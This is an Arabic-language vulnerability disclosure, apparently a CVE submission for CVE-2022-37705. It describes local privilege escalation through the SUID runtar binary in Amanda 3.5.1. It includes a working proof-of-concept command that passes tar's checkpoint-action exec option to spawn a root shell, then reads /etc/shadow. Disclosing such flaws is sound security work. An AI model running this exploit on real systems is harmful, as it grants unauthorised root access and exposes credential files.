
Amanda 3.5.1 ثاني LPE.
[الوصف المقترح] تم العثور على ثغرة تصعيد صلاحيات في Amanda 3.5.1 يمكن أن ترفع صلاحيات مستخدم النسخ الاحتياطي إلى صلاحيات الجذر. المكوّن الضعيف هو runtar SUID وهو مجرد غلاف لتشغيل /usr/bin/tar مع وسائط محددة يمكن للمهاجم التحكم بها. لا يتحقق البرنامج بشكل صحيح من الوسائط الممررة إلى ثنائي tar (يفترض أن جميع الوسائط يجب أن تكون بهذا الشكل --ARG VALUE لكن يمكننا توفير --ARG=VALUE كوسيطة واحدة).
[معلومات إضافية] يمكن استخدام هذا الخلل لتنفيذ الأكواد، وحجب الخدمة، وتصعيد الصلاحيات، وكشف المعلومات. هذا هو إثبات المفهوم (PoC) لاستغلاله والحصول على قشرة جذر: backup@maher:/lib/amanda$ id uid=34(backup) gid=34(backup) groups=34(backup),6(disk),26(tape)
backup@maher:/lib/amanda$ head /etc/shadow head: cannot open '/etc/shadow' for reading: Permission denied
backup@maher:/lib/amanda$ ./runtar NOCONFIG tar --create --file=/dev/null --checkpoint=1 --directory=. --checkpoint-action=exec=/bin/sh /dev/null tar: Removing leading `/' from member names
head /etc/shadow
root:!:19132:0:99999:7::: daemon::19101:0:99999:7::: bin::19101:0:99999:7::: sys::19101:0:99999:7::: sync::19101:0:99999:7::: games::19101:0:99999:7::: man::19101:0:99999:7::: lp::19101:0:99999:7::: mail::19101:0:99999:7::: news:*:19101:0:99999:7:::
[نوع الثغرة: أخرى] فحص الوسائط المعيب.
[بائع المنتج] Amanda
[قاعدة كود المنتج المتأثر] runtar - 3.5.1
[المكوّن المتأثر] الثنائي SUID المتأثر هو: runtar الملف المتأثر هو: runtar.c أسطر الأكواد المتأثرة تبدأ من السطر 162.
[نوع الهجوم] محلي
[تأثير تنفيذ الأكواد] true
[تأثير حجب الخدمة] true
[تأثير تصعيد الصلاحيات] true
[تأثير كشف المعلومات] true
[متجهات الهجوم] لاستغلال الثنائي، عليك فقط تمرير وسائط مصممة بعناية إلى ثنائي runtar SUID لتصعيد الصلاحيات إلى الجذر.
[المرجع] http://www.amanda.org/
[مكتشف الثغرة] Maher Azzouzi
استخدم CVE-2022-37705.